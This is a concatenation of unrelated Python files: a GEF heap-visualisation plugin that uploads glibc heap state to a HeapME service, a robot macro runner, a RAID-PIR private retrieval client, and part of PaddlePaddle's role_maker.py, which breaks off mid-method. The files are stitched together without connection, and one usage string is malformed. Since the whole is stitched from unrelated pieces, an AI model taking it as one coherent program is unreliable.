def confirm(self, msg):
valid = { "y": True, "yes": True, "n": False, "no": False }
while True:
choice = input(msg)
if choice in valid:
return valid[choice]
else:
print("Please respond with 'y' or 'n' (or 'yes' or 'no')")
def clean(self, event):
global heapme_is_running
print("Hold on, {0} is exiting cleanly".format(Color.colorify("HeapME", "blue")), end="...")
heapme_push({'type': 'done'})
sio.disconnect()
heapme_is_running = False
print("Adios!")
gef_on_exit_unhook(self.clean)
@register_command
class HeapMeWatch(GenericCommand):
"""Updates the heap layout when this breakpoint is hit"""
_cmdline_ = "heapme watch"
_syntax_ = "{:s} <address>".format(_cmdline_)
_example_ = "{0:s} *0x0xbadc0ffee0ddf00d".format(_cmdline_)
@only_if_gdb_running
def do_invoke(self, argv):
if not argv or len(argv) != 1:
self.usage()
return
if not get_gef_setting("heapme.enabled"):
return
HeapMeWatchAddress(argv[0])
ok("HeapMe will update the heap chunks when the {0:s} breakpoint is hit".format(Color.colorify(argv[0], "yellow")))
@register_command
class HeapMePush(GenericCommand):
"""Uploads all events to the HeapME URL"""
_cmdline_ = "heapme push"
_syntax_ = "{:s}".format(_cmdline_)
_example_ = "{0:s}".format(_cmdline_)
@only_if_gdb_running
def do_invoke(self, argv):
if not get_gef_setting("heapme.enabled"):
return
heapme_push()
@sio.event
def message(data):
global heapme_is_authorized
    if isinstance(data, dict) and data.get('authorized'):
heapme_is_authorized = True
return
else:
err("{0:s}: {1:s}".format(Color.colorify("HeapME", "blue"), data))
sio.disconnect()
print(data)
class HeapMeWatchAddress(gdb.Breakpoint):
def stop(self):
heapme_update()
return False
def _get_heap_segment():
heap_section = [x for x in get_process_maps() if x.path == "[heap]"]
if not heap_section:
#err("No heap section")
return
arena = get_main_arena()
if arena is None:
#err("No valid arena")
return
heap_section = heap_section[0].page_start
top_chunk_addr = int(arena.top)
    view_size = (top_chunk_addr - heap_section + 16) // 8  # number of 8-byte giant words to dump
cmd = "x/%dxg %s" % (view_size, heap_section)
heap_region = gdb.execute(cmd, to_string=True)
return heap_region
def heapme_update():
if not get_gef_setting("heapme.enabled"):
return
#Used to restore previous gef.disable_color setting
_prev_gef_disable_color = get_gef_setting("gef.disable_color")
#Temporarily disable color to simplify parsing
set_gef_setting("gef.disable_color", True)
arenas = {'type': 'arenas', 'data': False}
try:
arena = GlibcArena(__gef_default_main_arena__)
arenas = {'type': 'arenas', 'data': str(arena)}
    except gdb.error:
        # No valid arena: restore the color setting before returning
        set_gef_setting("gef.disable_color", _prev_gef_disable_color)
        return
fast = gdb.execute("heap bins fast", to_string=True)
tcache = gdb.execute("heap bins tcache", to_string=True)
unsorted = gdb.execute("heap bins unsorted", to_string=True)
small = gdb.execute("heap bins small", to_string=True)
large = gdb.execute("heap bins large", to_string=True)
chunks = gdb.execute("heap chunks", to_string=True)
_new_event = [
arenas,
{ 'type':'fast', 'data': str(fast) },
{ 'type':'tcache', 'data': str(tcache) },
{ 'type':'unsorted', 'data': str(unsorted) },
{ 'type':'small', 'data': str(small) },
{ 'type':'large', 'data': str(large) },
{ 'type':'chunks', 'chunks_summary': str(chunks), 'data':_get_heap_segment() }
]
#Restore previous setting
set_gef_setting("gef.disable_color", _prev_gef_disable_color)
heapme_push(_new_event)
def heapme_push(heapme_events = False):
if type(heapme_events) is dict:
heapme_events = [ heapme_events ]
if not get_gef_setting("heapme.enabled") or not heapme_events:
return
if get_gef_setting("heapme.verbose"):
print("{0:s}: Uploading event".format(Color.colorify("HeapME", "blue")))
sio.emit('push', heapme_events)
def hm_log_server():
async def logHandler(request):
data = await request.json()
if not get_gef_setting("heapme.enabled"):
return
heapme_push({ 'type': 'log', 'data': data['msg'] })
return web.Response(text="OK")
app = web.Application()
app.add_routes([web.post('/', logHandler)])
runner = web.AppRunner(app)
return runner
def hm_run_log_server(runner):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(runner.setup())
site = web.TCPSite(runner, host=LOG_SRV_HOST, port=LOG_SRV_PORT)
loop.run_until_complete(site.start())
loop.run_forever()
t = threading.Thread(target=hm_run_log_server, args=(hm_log_server(),))
t.daemon = True
t.start()
register_external_command(HeapMe())
|
__init__.py
|
import threading
class AutonomousMode(object):
"""
Class for executing an autonomous mode. Usually done by executing macros.
"""
thread = None
running = False
def __init__(self):
self.running_macros = set()
def run_autonomous(self):
"""
Runs exec_autonomous in a new thread.
"""
self.thread = threading.Thread(target=self.exec_autonomous)
self.thread.start()
def exec_autonomous(self):
"""
Runs autonomous. This contains exception logic; subclasses
should override _exec_autonomous.
"""
self.running = True
try:
self._exec_autonomous()
except StopIteration:
pass
def _exec_autonomous(self):
"""
        Runs autonomous. Override this.
Within this method, don't call macro.run or macro.execute directly, instead,
call self.run_macro or self.exec_macro in order to keep tabs on them
and stop the macros when this thread is stopped.
"""
pass
def stop_autonomous(self):
self.running = False
for macro in self.running_macros:
macro.kill()
self.running_macros.clear()
def exec_macro(self, macro):
"""
Executes a macro in the current thread.
Adds macro to self.running_macros when started,
removes it when finished.
If autonomous is stopped,
a StopIteration exception is raised in order to halt
exec_autonomous.
"""
if not self.running:
raise StopIteration()
self.running_macros.add(macro)
macro.reset()
macro.execute()
if macro in self.running_macros:
self.running_macros.remove(macro)
if not self.running:
raise StopIteration()
def run_macro(self, macro):
"""
Runs a macro in a separate thread.
Returns a handle to the thread.
"""
thread = threading.Thread(target=self.exec_macro, args=(macro, ))
thread.start()
return thread
class MacroSequence(AutonomousMode):
"""
Class for executing a series of macros sequentially.
"""
    def __init__(self, macros=None):
        """
        Initializes the sequence with the given list of macros (empty by default).
        """
        # Avoid sharing a mutable default argument between instances.
        self.macros = macros if macros is not None else []
super().__init__()
def add_macro(self, macro):
"""
Adds a macro to self.macros.
"""
self.macros.append(macro)
def _exec_autonomous(self):
"""
Iterates through the list of macros, resets them, then runs them sequentially.
"""
for macro in self.macros:
self.exec_macro(macro)
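# A minimal sketch of the interface a macro object needs so that exec_macro()
# and stop_autonomous() above can drive it: reset(), execute() and kill().
# The class below is illustrative only; real macro classes live elsewhere.
class _ExampleMacro(object):
    def __init__(self):
        self._killed = False

    def reset(self):
        # called by exec_macro() before execute()
        self._killed = False

    def execute(self):
        # do the macro's work; return when finished or once kill() was called
        pass

    def kill(self):
        # called by stop_autonomous() to abort a running macro
        self._killed = True

# Usage sketch:
#   seq = MacroSequence([_ExampleMacro(), _ExampleMacro()])
#   seq.run_autonomous()   # runs the macros sequentially in a new thread
#   seq.stop_autonomous()  # aborts anything still running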
|
raidpir_client.py
|
#!/usr/bin/env python3
"""
<Author>
Daniel Demmler
(inspired from upPIR by Justin Cappos)
(inspired from a previous version by Geremy Condra)
<Date>
January 2019
<Description>
Client code for retrieving RAID-PIR files. This program uses a manifest
to communicate with a vendor and retrieve a list of mirrors. The client
then _privately_ downloads the appropriate files from mirrors in the mirror
list. None of the mirrors can tell what file or files were downloaded.
For more technical explanation, please see the paper.
<Usage>
see python raidpir_client.py --help
$ python raidpir_client.py
[--retrievemanifestfrom <IP>:<PORT>]
[-r <REDUNDANCY>]
[-R]
[-p]
[-b]
[-t]
[--vendorip <IP>]
file1 [file2 ...]
<Options>
See below
"""
# This file is laid out in two main parts. First, there are some helper
# functions to do moderately complex things like retrieving a block from a
# mirror or splitting a file into blocks. The second part contains the option
# parsing and main. To get an overall feel for the code, it is recommended
# to follow the execution from main on.
#
# EXTENSION POINTS:
#
# Making the client extensible is a major problem. In particular, we will
# need to modify mirror selection, block selection, malicious mirror detection,
# and avoiding slow nodes simultaneously. To do this effectively, we need
# some sort of mechanism that gives the programmer control over how to handle
# these.
#
# The XORRequestor interface is used to address these issues.
# The programmer defines an object that is provided the manifest,
# mirrorlist, and blocks to retrieve. The XORRequestor object must support
# several methods: get_next_xorrequest(), notify_failure(xorrequest),
# notify_success(xorrequest, xordata), and return_block(blocknum). The
# request_blocks_from_mirrors function in this file will use threads to call
# these methods to determine what to retrieve. The notify_* routines are
# used to inform the XORRequestor object of prior results so that it can
# decide how to issue future block requests. This separates out the 'what'
# from the 'how' but has a slight loss of control. Note that the block
# reconstruction, etc. is done here to allow easy extensibility of malicious
# mirror detection / vendor notification.
#
# The manifest file could also be extended to support huge files (those that
# span multiple releases). The client would need to download files from
# multiple releases and then stitch them back together. This would require
# minor changes (or possibly could be done using this code as a black box).
#
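# As a rough illustration of the interface described above (not used anywhere in
# this file; simplexorrequestor provides the real implementations), a custom
# requestor skeleton could look like this:
class _ExampleXORRequestor(object):
    """Illustrative skeleton only; method bodies are placeholders."""
    def get_next_xorrequest(self, tid):
        # return () when there is nothing left for this thread to request
        return ()

    def notify_failure(self, xorrequest):
        # a mirror failed to answer; reschedule the request or drop the mirror
        pass

    def notify_success(self, xorrequest, xordata):
        # store the XORed answer so the requested blocks can be reconstructed
        pass

    def return_block(self, blocknum):
        # hand back the reconstructed contents of block blocknum
        raise NotImplementedError("illustrative skeleton only")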
import sys
import optparse
# helper functions that are shared
import raidpirlib as lib
# used to issue requests in parallel
import threading
import simplexorrequestor
import session
# for basename
import os.path
# to sleep...
import time
_timer = lib._timer
def _request_helper(rxgobj, tid):
"""Private helper to get requests.
Multiple threads will execute this, each with a unique tid."""
thisrequest = rxgobj.get_next_xorrequest(tid)
#the socket is fixed for each thread, so we only need to do this once
socket = thisrequest[0]['sock']
# go until there are no more requests
while thisrequest != ():
bitstring = thisrequest[2]
try:
# request the XOR block...
lib.request_xorblock(socket, bitstring)
except Exception as e:
if 'socked' in str(e):
rxgobj.notify_failure(thisrequest)
sys.stdout.write('F')
sys.stdout.flush()
else:
# otherwise, re-raise...
raise
# regardless of failure or success, get another request...
thisrequest = rxgobj.get_next_xorrequest(tid)
# and that's it!
return
def _request_helper_chunked(rxgobj, tid):
"""Private helper to get requests with chunks.
Potentially multiple threads will execute this, each with a unique tid."""
thisrequest = rxgobj.get_next_xorrequest(tid)
#the socket is fixed for each thread, so we only need to do this once
socket = thisrequest[0]['sock']
rqtype = thisrequest[3] #the request type is also fixed
# go until there are no more requests
while thisrequest != ():
chunks = thisrequest[2]
try:
# request the XOR block...
if rqtype == 1: # chunks and seed expansion
lib.request_xorblock_chunked_rng(socket, chunks)
elif rqtype == 2: # chunks, seed expansion and parallel
lib.request_xorblock_chunked_rng_parallel(socket, chunks)
else: # only chunks (redundancy)
lib.request_xorblock_chunked(socket, chunks)
except Exception as e:
if 'socked' in str(e):
rxgobj.notify_failure(thisrequest)
sys.stdout.write('F')
sys.stdout.flush()
else:
# otherwise, re-raise...
raise
# regardless of failure or success, get another request...
thisrequest = rxgobj.get_next_xorrequest(tid)
# and that's it!
return
def request_blocks_from_mirrors(requestedblocklist, manifestdict, redundancy, rng, parallel):
"""
<Purpose>
Retrieves blocks from mirrors
<Arguments>
requestedblocklist: the blocks to acquire
manifestdict: the manifest with information about the release
<Side Effects>
Contacts mirrors to retrieve blocks. It uses some global options
<Exceptions>
TypeError may be raised if the provided lists are invalid.
socket errors may be raised if communications fail.
<Returns>
A dict mapping blocknumber -> blockcontents.
"""
# let's get the list of mirrors...
if _commandlineoptions.vendorip == None:
# use data from manifest
mirrorinfolist = lib.retrieve_mirrorinfolist(manifestdict['vendorhostname'], manifestdict['vendorport'])
else:
# use commandlineoption
mirrorinfolist = lib.retrieve_mirrorinfolist(_commandlineoptions.vendorip)
print("Mirrors: ", mirrorinfolist)
if _commandlineoptions.timing:
setup_start = _timer()
# no chunks (regular upPIR / Chor)
if redundancy == None:
# let's set up a requestor object...
rxgobj = simplexorrequestor.RandomXORRequestor(mirrorinfolist, requestedblocklist, manifestdict, _commandlineoptions.numberofmirrors, _commandlineoptions.batch, _commandlineoptions.timing)
if _commandlineoptions.timing:
setup_time = _timer() - setup_start
_timing_log.write(str(len(rxgobj.activemirrors[0]['blockbitstringlist']))+"\n")
_timing_log.write(str(len(rxgobj.activemirrors[0]['blockbitstringlist']))+"\n")
print("Blocks to request:", len(rxgobj.activemirrors[0]['blockbitstringlist']))
if _commandlineoptions.timing:
req_start = _timer()
# let's fire up the requested number of threads. Our thread will also participate (-1 because of us!)
for tid in range(_commandlineoptions.numberofmirrors - 1):
threading.Thread(target=_request_helper, args=[rxgobj, tid]).start()
_request_helper(rxgobj, _commandlineoptions.numberofmirrors - 1)
# wait for receiving threads to finish
for mirror in rxgobj.activemirrors:
mirror['rt'].join()
else: # chunks
# let's set up a chunk requestor object...
rxgobj = simplexorrequestor.RandomXORRequestorChunks(mirrorinfolist, requestedblocklist, manifestdict, _commandlineoptions.numberofmirrors, redundancy, rng, parallel, _commandlineoptions.batch, _commandlineoptions.timing)
if _commandlineoptions.timing:
setup_time = _timer() - setup_start
_timing_log.write(str(len(rxgobj.activemirrors[0]['blocksneeded']))+"\n")
_timing_log.write(str(len(rxgobj.activemirrors[0]['blockchunklist']))+"\n")
print("# Blocks needed:", len(rxgobj.activemirrors[0]['blocksneeded']))
if parallel:
print("# Requests:", len(rxgobj.activemirrors[0]['blockchunklist']))
#chunk lengths in BYTE
global chunklen
global lastchunklen
chunklen = (manifestdict['blockcount'] / 8) / _commandlineoptions.numberofmirrors
lastchunklen = lib.bits_to_bytes(manifestdict['blockcount']) - (_commandlineoptions.numberofmirrors-1)*chunklen
if _commandlineoptions.timing:
req_start = _timer()
# let's fire up the requested number of threads. Our thread will also participate (-1 because of us!)
for tid in range(_commandlineoptions.numberofmirrors - 1):
threading.Thread(target=_request_helper_chunked, args=[rxgobj, tid]).start()
_request_helper_chunked(rxgobj, _commandlineoptions.numberofmirrors - 1)
# wait for receiving threads to finish
for mirror in rxgobj.activemirrors:
mirror['rt'].join()
rxgobj.cleanup()
if _commandlineoptions.timing:
req_time = _timer() - req_start
recons_time, comptimes, pings = rxgobj.return_timings()
avg_ping = sum(pings) / _commandlineoptions.numberofmirrors
avg_comptime = sum(comptimes) / _commandlineoptions.numberofmirrors
_timing_log.write(str(setup_time)+ "\n")
_timing_log.write(str(req_time)+ "\n")
_timing_log.write(str(recons_time)+ "\n")
_timing_log.write(str(avg_comptime)+ " " + str(comptimes)+ "\n")
_timing_log.write(str(avg_ping)+ " " + str(pings)+ "\n")
# okay, now we have them all. Let's get the returned dict ready.
retdict = {}
for blocknum in requestedblocklist:
retdict[blocknum] = rxgobj.return_block(blocknum)
return retdict
def request_files_from_mirrors(requestedfilelist, redundancy, rng, parallel, manifestdict):
"""
<Purpose>
Reconstitutes files by privately contacting mirrors
<Arguments>
requestedfilelist: the files to acquire
redundancy: use chunks and overlap this often
        rng: use seed expansion (RNG) to generate the latter chunks
parallel: query one block per chunk
manifestdict: the manifest with information about the release
<Side Effects>
Contacts mirrors to retrieve files. They are written to disk
<Exceptions>
TypeError may be raised if the provided lists are invalid.
socket errors may be raised if communications fail.
<Returns>
None
"""
neededblocks = []
#print "Request Files:"
# let's figure out what blocks we need
for filename in requestedfilelist:
theseblocks = lib.get_blocklist_for_file(filename, manifestdict)
# add the blocks we don't already know we need to request
for blocknum in theseblocks:
if blocknum not in neededblocks:
neededblocks.append(blocknum)
# do the actual retrieval work
blockdict = request_blocks_from_mirrors(neededblocks, manifestdict, redundancy, rng, parallel)
# now we should write out the files
for filename in requestedfilelist:
filedata = lib.extract_file_from_blockdict(filename, manifestdict, blockdict)
# let's check the hash
thisfilehash = lib.find_hash(filedata, manifestdict['hashalgorithm'])
for fileinfo in manifestdict['fileinfolist']:
# find this entry
if fileinfo['filename'] == filename:
if thisfilehash == fileinfo['hash']:
# we found it and it checks out!
break
else:
raise Exception("Corrupt manifest has incorrect file hash despite passing block hash checks!")
else:
raise Exception("Internal Error: Cannot locate fileinfo in manifest!")
# open the filename w/o the dir and write it
filenamewithoutpath = os.path.basename(filename)
open(filenamewithoutpath, "wb").write(filedata)
print("wrote", filenamewithoutpath)
########################## Option parsing and main ###########################
_commandlineoptions = None
def parse_options():
"""
<Purpose>
Parses command line arguments.
<Arguments>
None
<Side Effects>
All relevant data is added to _commandlineoptions
<Exceptions>
These are handled by optparse internally. I believe it will print / exit
itself without raising exceptions further. I do print an error and
exit if there are extra args...
<Returns>
The list of files to retrieve
"""
global _commandlineoptions
# should be true unless we're initing twice...
assert _commandlineoptions == None
parser = optparse.OptionParser()
parser.add_option("", "--retrievemanifestfrom", dest="retrievemanifestfrom",
type="string", metavar="vendorIP:port", default="",
help="Specifies the vendor to retrieve the manifest from (default None).")
parser.add_option("", "--printfilenames", dest="printfiles",
action="store_true", default=False,
help="Print a list of all available files in the manifest file.")
parser.add_option("", "--vendorip", dest="vendorip", type="string", metavar="IP",
default=None, help="Vendor IP for overwriting the value from manifest; for testing purposes.")
parser.add_option("-m", "--manifestfile", dest="manifestfilename",
type="string", default="manifest.dat",
help="The manifest file to use (default manifest.dat).")
parser.add_option("-k", "--numberofmirrors", dest="numberofmirrors",
type="int", default=2,
help="How many servers do we query? (default 2)")
parser.add_option("-r", "--redundancy", dest="redundancy",
type="int", default=None,
help="Activates chunks and specifies redundancy r (how often they overlap). (default None)")
parser.add_option("-R", "--rng", action="store_true", dest="rng", default=False,
help="Use seed expansion from RNG for latter chunks (default False). Requires -r")
parser.add_option("-p", "--parallel", action="store_true", dest="parallel", default=False,
help="Query one block per chunk in parallel (default False). Requires -r")
parser.add_option("-b", "--batch", action="store_true", dest="batch", default=False,
help="Request the mirror to do computations in a batch. (default False)")
parser.add_option("-t", "--timing", action="store_true", dest="timing", default=False,
help="Do timing measurements and print them at the end. (default False)")
parser.add_option("-c", "--comment", type="string", dest="comment", default="",
help="Debug comment on this run, used to name timing log file.")
# let's parse the args
(_commandlineoptions, remainingargs) = parser.parse_args()
# Force the use of a seeded rng (-R) if MB (-p) is used. Temporary, until -p without -R is implemented.
if _commandlineoptions.parallel:
_commandlineoptions.rng = True
# sanity check parameters
# k >= 2
if _commandlineoptions.numberofmirrors < 2:
print("Mirrors to contact must be > 1")
sys.exit(1)
# r >= 2
if _commandlineoptions.redundancy != None and _commandlineoptions.redundancy < 2:
print("Redundancy must be > 1")
sys.exit(1)
# r <= k
if _commandlineoptions.redundancy != None and (_commandlineoptions.redundancy > _commandlineoptions.numberofmirrors):
print("Redundancy must be less or equal to number of mirrors (", _commandlineoptions.numberofmirrors, ")")
sys.exit(1)
# RNG or parallel query without chunks activated
if (_commandlineoptions.rng or _commandlineoptions.parallel) and not _commandlineoptions.redundancy:
print("Chunks must be enabled and redundancy set (-r <number>) to use RNG or parallel queries!")
sys.exit(1)
if len(remainingargs) == 0 and _commandlineoptions.printfiles == False:
print("Must specify at least one file to retrieve!")
sys.exit(1)
#filename(s)
_commandlineoptions.filestoretrieve = remainingargs
def start_logging():
global _timing_log
global total_start
logfilename = time.strftime("%y%m%d") + "_" + _commandlineoptions.comment
logfilename += "_k" + str(_commandlineoptions.numberofmirrors)
if _commandlineoptions.redundancy:
logfilename += "_r" + str(_commandlineoptions.redundancy)
if _commandlineoptions.rng:
logfilename += "_R"
if _commandlineoptions.parallel:
logfilename += "_p"
if _commandlineoptions.batch:
logfilename += "_b"
cur_time = time.strftime("%y%m%d-%H%M%S")
_timing_log = open("timing_" + logfilename + ".log", "a")
_timing_log.write(cur_time + "\n")
_timing_log.write(str(_commandlineoptions.filestoretrieve) + " ")
_timing_log.write(str(_commandlineoptions.numberofmirrors) + " ")
_timing_log.write(str(_commandlineoptions.redundancy) + " ")
_timing_log.write(str(_commandlineoptions.rng) + " ")
_timing_log.write(str(_commandlineoptions.parallel) + " ")
_timing_log.write(str(_commandlineoptions.batch) + "\n")
total_start = _timer()
def main():
"""main function with high level control flow"""
    # If we were asked to retrieve the manifest file, do so...
if _commandlineoptions.retrievemanifestfrom:
# We need to download this file...
rawmanifestdata = lib.retrieve_rawmanifest(_commandlineoptions.retrievemanifestfrom)
# ...make sure it is valid...
manifestdict = lib.parse_manifest(rawmanifestdata)
# ...and write it out if it's okay
open(_commandlineoptions.manifestfilename, "wb").write(rawmanifestdata)
else:
# Simply read it in from disk
rawmanifestdata = open(_commandlineoptions.manifestfilename, "rb").read()
manifestdict = lib.parse_manifest(rawmanifestdata)
# we will check that the files are in the release
# find the list of files
filelist = lib.get_filenames_in_release(manifestdict)
if (manifestdict['blockcount'] < _commandlineoptions.numberofmirrors * 8) and _commandlineoptions.redundancy != None:
print("Block count too low to use chunks! Try reducing the block size or add more files to the database.")
sys.exit(1)
if _commandlineoptions.printfiles:
print("Manifest - Blocks:", manifestdict['blockcount'], "x", manifestdict['blocksize'], "Byte - Files:\n", filelist)
if _commandlineoptions.timing:
_timing_log.write(str(manifestdict['blocksize']) + "\n")
_timing_log.write(str(manifestdict['blockcount']) + "\n")
# ensure the requested files are in there...
for filename in _commandlineoptions.filestoretrieve:
if filename not in filelist:
print("The file", filename, "is not listed in the manifest.")
sys.exit(2)
# don't run PIR if we're just printing the filenames in the manifest
if len(_commandlineoptions.filestoretrieve) > 0:
request_files_from_mirrors(_commandlineoptions.filestoretrieve, _commandlineoptions.redundancy, _commandlineoptions.rng, _commandlineoptions.parallel, manifestdict)
if __name__ == '__main__':
print("RAID-PIR Client", lib.pirversion)
parse_options()
if _commandlineoptions.timing:
start_logging()
main()
if _commandlineoptions.timing:
ttime = _timer() - total_start
_timing_log.write(str(ttime)+ "\n")
_timing_log.close()
|
role_maker.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of Role Makers."""
import os
import time
import numpy as np
import warnings
from multiprocessing import Process, Manager
import paddle
import paddle.fluid as fluid
from paddle.distributed.fleet.base.private_helper_function import wait_server_ready
class Role:
WORKER = 1
SERVER = 2
HETER_WORKER = 3
ALL = 4
class Gloo(object):
"""
Gloo is a universal class for barrier and collective communication
"""
class RENDEZVOUS:
HDFS = 1
FILE = 2
HTTP = 3
def __init__(self):
self._worker_comm = None
self._server_comm = None
self._nodes_comm = None
self._comm_world = ["worker", "server", "all"]
self._err_init = "gloo is not initialized, will not communicator with other nodes"
self._err_type = "gloo initialized error, please check arguments"
self._err_world = "argument error, comm_world must in {}".format(
self._comm_world)
self._is_initialized = False
self._init_timeout_seconds = 3600
self._run_timeout_seconds = 9999999
self._rendezvous = None
self._role = None
self._iface = None
self._role_id = -1
self._worker_num = -1
self._server_num = -1
self._need_init_all = False
def init(self,
rendezvous,
role,
role_id,
worker_num,
server_num,
need_init_all=False,
kwargs=None):
self._rendezvous = rendezvous
self._role = role
self._role_id = role_id
self._worker_num = worker_num
self._server_num = server_num
self._need_init_all = need_init_all
self._iface = ""
self._prefix = kwargs.get("store.prefix", "")
http_server = None
if self._rendezvous == Gloo.RENDEZVOUS.HDFS:
dfs_name = kwargs.get("dfs.name", "")
dfs_ugi = kwargs.get("dfs.ugi", "")
dfs_path = kwargs.get("dfs.path", "")
if not dfs_name or not dfs_ugi or not dfs_path:
raise ValueError(self._err_type)
self._init_dfs(dfs_name, dfs_ugi, dfs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.FILE:
fs_path = kwargs.get("dfs.path", "")
if not fs_path:
raise ValueError(self._err_type)
self._init_fs(fs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.HTTP:
ip = kwargs.get("http.host", "")
port = kwargs.get("http.port", "")
start_http_server = kwargs.get("start_http_server", False)
http_server_d = kwargs.get("http_server_d")
if not ip or not port:
raise ValueError(self._err_type)
http_server = self._init_http(ip, port, self._prefix,
start_http_server, http_server_d)
else:
raise ValueError(self._err_type)
self._is_initialized = True
self._http_server = http_server
def _init_fs(self, fs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(fs_path, role), "", "")
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_dfs(self, dfs_name, dfs_ugi, dfs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(dfs_path, role), dfs_name, dfs_ugi)
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_http(self, ip, port, prefix, start_http_server, http_server_d):
def __start_kv_server(http_server_d, size_d):
from paddle.distributed.fleet.utils.http_server import KVServer
http_server = KVServer(port, size_d)
http_server.start()
wait_seconds = 5
while http_server_d.get("running", False):
time.sleep(wait_seconds)
http_server.stop()
def init_kv_server(http_server_d):
size_d = {
"trainer": self._worker_num,
"pserver": self._server_num,
"all": self._worker_num + self._server_num
}
http_server_d["running"] = True
# child process for http server
_http_server = Process(
target=__start_kv_server, args=(http_server_d, size_d))
_http_server.daemon = True
# set running status to True
# start child process
_http_server.start()
return _http_server
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_http_store(ip, port, role)
ep = ":".join([ip, str(port)])
wait_server_ready([ep])
gloo.init()
return gloo
port = int(port)
if start_http_server:
http_server = init_kv_server(http_server_d)
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
if start_http_server:
http_server_d["running"] = False
http_server.join()
def _get_rank_nodes(self, role):
nodes = 0
rank = -1
if role == Role.WORKER:
nodes = self._worker_num
rank = self._role_id
elif role == Role.SERVER:
nodes = self._server_num
rank = self._role_id
elif role == Role.ALL:
nodes = self._worker_num + self._server_num
if self._role == Role.WORKER:
rank = self._role_id
else:
rank = self._worker_num + self._role_id
else:
            raise ValueError(self._err_type)
return rank, nodes
def __get_default_iface(self):
"""
get default physical interface
"""
default1 = self.__get_default_iface_from_gateway()
default2 = self.__get_default_iface_from_interfaces()
return default2 if default1 == "lo" else default1
def __get_default_iface_from_gateway(self):
"""
get default physical interface
"""
res = os.popen("route -A inet").read().strip().split("\n")
gateway_idx = None
iface_idx = None
for item in res:
item = item.split()
if "Gateway" in item and "Iface" in item:
gateway_idx = item.index("Gateway")
iface_idx = item.index("Iface")
elif gateway_idx != None and iface_idx != None:
gateway = None
if len(item) > gateway_idx:
gateway = item[gateway_idx]
if gateway and gateway != '*' and gateway != "0.0.0.0" and len(
item) > iface_idx:
return item[iface_idx]
return "lo"
def __get_default_iface_from_interfaces(self):
"""
get default physical interface
"""
res = os.popen("ip -f inet addr | awk NR%3==1").read().strip().split(
"\n")
for item in res:
if "BROADCAST" in item:
return item.split(":")[1].strip()
return "lo"
def barrier(self, comm_world):
"""
dummy barrier, do nothing
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
self._worker_comm.barrier()
elif comm_world == "server":
self._server_comm.barrier()
else:
self._nodes_comm.barrier()
def all_reduce(self, input, mode="sum", comm_world="worker"):
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
input = np.array(input)
input_shape = input.shape
input_list = input.reshape(-1).tolist()
self.barrier(comm_world)
if comm_world == "worker":
ans = self._worker_comm.all_reduce(input_list, mode)
elif comm_world == "server":
ans = self._server_comm.all_reduce(input_list, mode)
else:
ans = self._nodes_comm.all_reduce(input_list, mode)
output = np.array(ans).reshape(input_shape)
return output
def all_gather(self, input, comm_world="worker"):
"""
dummy all gather, do nothing
Args:
obj(any): obj to do all gather
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
output = self._worker_comm.all_gather(input)
elif comm_world == "server":
output = self._server_comm.all_gather(input)
else:
output = self._nodes_comm.all_gather(input)
return output
class RoleMakerBase(object):
"""
RoleMakerBase is a base class for assigning a role to current process
in distributed training.
A paddle developer can implement RoleMakerBase to design a role maker
for worker or pserver assignment.
"""
def __init__(self):
self._worker_endpoints = []
self._server_endpoints = []
self._role_is_generated = False
self._role = None
self._current_id = -1
# for heter parameter server mode
self._heter_trainer_endpoints = []
self._heter_trainer_device = "CPU"
self._is_heter_parameter_server_mode = False
def _is_worker(self):
"""
return is_worker() of current process
"""
